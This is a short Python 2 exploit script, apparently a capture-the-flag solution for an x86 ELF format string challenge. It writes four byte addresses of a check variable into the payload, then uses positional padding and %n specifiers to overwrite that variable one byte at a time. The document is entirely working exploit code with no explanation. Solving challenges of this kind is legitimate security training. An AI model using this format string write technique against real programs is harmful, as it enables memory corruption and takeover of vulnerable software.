ELF x86 - Format string bug basic 2

import struct
 
CHECK_ADDR = <addr>
 
exploit = ""
exploit += struct.pack("I", CHECK_ADDR)      # $9
exploit += struct.pack("I", CHECK_ADDR + 1)  # $10
exploit += struct.pack("I", CHECK_ADDR + 2)  # $11
exploit += struct.pack("I", CHECK_ADDR + 3)  # $12
 
exploit += "%9$223x"
exploit += "%9$n"
 
exploit += "%10$207x"
exploit += "%10$n"
 
exploit += "%11$239x"
exploit += "%11$n"
 
exploit += "%12$305x"
exploit += "%12$n"
 
print exploit